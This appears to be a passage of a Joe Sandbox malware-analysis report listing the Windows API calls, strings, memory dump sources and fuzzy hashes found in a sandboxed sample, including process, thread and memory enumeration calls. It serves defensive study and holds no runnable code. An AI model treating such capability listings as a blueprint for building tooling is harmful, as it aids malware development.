                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Eventtime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2982266575-0
                                                                                                                              • Opcode ID: ceed3d84f787894fee753d7bcb45271a28c025b12894e7e55ec63e83cb55bec4
                                                                                                                              • Instruction ID: 0678d62ecf99d55b22af7294a893d186f0bb4728c2d96bc1e9ce993ecea10482
                                                                                                                              • Opcode Fuzzy Hash: ceed3d84f787894fee753d7bcb45271a28c025b12894e7e55ec63e83cb55bec4
                                                                                                                              • Instruction Fuzzy Hash: CEC092F2BC03403FFA10A6A81CC2F271A8DE704B00F602492BB04EE2C2D5E288645A60
                                                                                                                              APIs
                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B24BEB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2525500382-0
                                                                                                                              • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                              • Instruction ID: a5f777c4dcdd36b3a317a1ed1576bb3681e6a149bbaab4bc5b821cc76ba6ac65
                                                                                                                              • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                              • Instruction Fuzzy Hash: F2B0923825832269EE1412610D04B3210AC8B50287F8500D1AE2CC8480EB00C0088832
                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02B24C03
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3341692771-0
                                                                                                                              • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                                                                              • Instruction ID: e651463e24f319c8827c7470e3241c4e437b8c0d113bdd894507220f4a01521c
                                                                                                                              • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                                                                              • Instruction Fuzzy Hash: 0CA022AC0083330A8F0B232C000002A2033BFE03003CAE0E8200C0A000CF3A8008AC30
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B22000), ref: 02B216A4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: ab99b24b78f9437852ee2238797199b8a2498a67ac7677a0514832296f9c264e
                                                                                                                              • Instruction ID: 1d79b50b0c22cdc729b8ca095956cb85fbf158e4ba4bf49645a447c39a526727
                                                                                                                              • Opcode Fuzzy Hash: ab99b24b78f9437852ee2238797199b8a2498a67ac7677a0514832296f9c264e
                                                                                                                              • Instruction Fuzzy Hash: 33F090B6A407A56FD711AE5E9C80786BB94FB00394F054579F94CA7341D770A818CBD4
                                                                                                                              APIs
                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B21FE4), ref: 02B21704
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1263568516-0
                                                                                                                              • Opcode ID: 2ba00299611f45ea70e58ecbe8b5427f13dd596bc4de90e946b7b25736447433
                                                                                                                              • Instruction ID: 6262fbca76cb8072c8e2e3ac14519ebcbf17b2491cee8cfd3457233760a87fc4
                                                                                                                              • Opcode Fuzzy Hash: 2ba00299611f45ea70e58ecbe8b5427f13dd596bc4de90e946b7b25736447433
                                                                                                                              • Instruction Fuzzy Hash: CBE086B53103216FE7105E7D5D407167BD8EB84654F1444B5F54DDB252D260E8188B60
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B3ABDB,?,?,02B3AC6D,00000000,02B3AD49), ref: 02B3A968
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B3A980
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B3A992
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B3A9A4
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B3A9B6
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B3A9C8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B3A9DA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B3A9EC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B3A9FE
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B3AA10
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B3AA22
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B3AA34
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B3AA46
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B3AA58
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B3AA6A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B3AA7C
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B3AA8E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                              • API String ID: 667068680-597814768
                                                                                                                              • Opcode ID: d82fce0bec06be86fd5439931257e157665c278c4867a57417a96e3f3180894f
                                                                                                                              • Instruction ID: 8b9c0a91e732243161c09d8a7148152fa5b14bcba0698a54c4a672503646aa77
                                                                                                                              • Opcode Fuzzy Hash: d82fce0bec06be86fd5439931257e157665c278c4867a57417a96e3f3180894f
                                                                                                                              • Instruction Fuzzy Hash: 3931E7B0A91360AFEB12AFB8DC95AE637E9EB05740B1009E5F04ECF215E7749815CF91
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B258D1
                                                                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B258E8
                                                                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 02B25918
                                                                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B2597C
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259B2
                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259C5
                                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259D7
                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259E3
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000), ref: 02B25A17
                                                                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330), ref: 02B25A23
                                                                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B25A45
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                              • API String ID: 3245196872-1565342463
                                                                                                                              • Opcode ID: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
                                                                                                                              • Instruction ID: ef19b5861f0a776c3709b57b8a60613d9e1f53b3104abb0afcf131cdb76060ab
                                                                                                                              • Opcode Fuzzy Hash: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
                                                                                                                              • Instruction Fuzzy Hash: 80415C71D00369AFDB20DAE8CC88ADEB3ADEB09310F4445E5A55DE7242D770DB488F50
                                                                                                                              APIs
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
                                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                              • API String ID: 1599918012-2375825460
                                                                                                                              • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                              • Instruction ID: 4e7c4795c87d4e92b067478b9e8efea4f613c2413f3a0341889c71a407bfe146
                                                                                                                              • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                              • Instruction Fuzzy Hash: 723147B1E5033C6AEB35DAB89C45BEF77AD9B04380F4441E1A64CE6182E6749E8C8F50
                                                                                                                              APIs
                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B27F75
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DiskFreeSpace
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1705453755-0
                                                                                                                              • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                                              • Instruction ID: 86d81e3383bfd5107e75066fa776f5b6d644b7628be5b0c381dc24be524bb113
                                                                                                                              • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                                              • Instruction Fuzzy Hash: E71100B5A00209AF9B04CF99C9809EFF7F9EFC8314B14C569A509EB254E6319A018B90
                                                                                                                              APIs
                                                                                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoLocale
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2299586839-0
                                                                                                                              • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                              • Instruction ID: 35a3ec67dbf0fe8769cda405791b51436c037b8161daa7ddb537672a3e602f75
                                                                                                                              • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                              • Instruction Fuzzy Hash: 9FE0D83570032417D311A5685C809F6B36D9B5C310F0041FEBD4DC7391EDA09D484EE8
                                                                                                                              APIs
                                                                                                                              • GetVersionExA.KERNEL32(?,02B4C106,00000000,02B4C11E), ref: 02B2B71A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Version
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1889659487-0
                                                                                                                              • Opcode ID: 4189a973054fdabbd04d8bf6fde7435a292a0ad65bee57349382d14a855aa87f
                                                                                                                              • Instruction ID: ecf8714acdbaaf4c9e509bd56a863722ef7d7c6f0ace28d3950ad161f215306c
                                                                                                                              • Opcode Fuzzy Hash: 4189a973054fdabbd04d8bf6fde7435a292a0ad65bee57349382d14a855aa87f
                                                                                                                              • Instruction Fuzzy Hash: 92F0DA78A443129FD350DF28D580F1577E5FB49B54F8089A9E89CC7390EB389418CF52
                                                                                                                              APIs
                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B2BDF2,00000000,02B2C00B,?,?,00000000,00000000), ref: 02B2A7A3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoLocale
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2299586839-0
                                                                                                                              • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                              • Instruction ID: 62a810153de6e0ef121c48807820436cf0107c596635a4854f344034414b8934
                                                                                                                              • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                              • Instruction Fuzzy Hash: 19D05EB630E3702AA220915A2D84DBBAAFCCBC57A1F0044BEF58CC6250D2008C0996F5
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LocalTime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 481472006-0
                                                                                                                              • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                              • Instruction ID: 2172b8c1bf90d8fd47c673e84136d5d5999d84b6ffb7ec30655d161e2957ab61
                                                                                                                              • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                              • Instruction Fuzzy Hash: 8EA0121040483001854037180C0217531445900620FC40FC068FC503D0ED1D012440D3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b5447e1caf31241e37e979d0d046299419a723541b8118e72370ed4302aab877
                                                                                                                              • Instruction ID: 552d0ca9083f253b7d3ad4b12e5ccd3adfcfc18fee7c168d114072fdd1bad608
                                                                                                                              • Opcode Fuzzy Hash: b5447e1caf31241e37e979d0d046299419a723541b8118e72370ed4302aab877
                                                                                                                              • Instruction Fuzzy Hash: 9E518E9641D3C24FC7635F3494E92C23FA1AD6312874E15DAC8E08F2A3E61A490BDF22
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
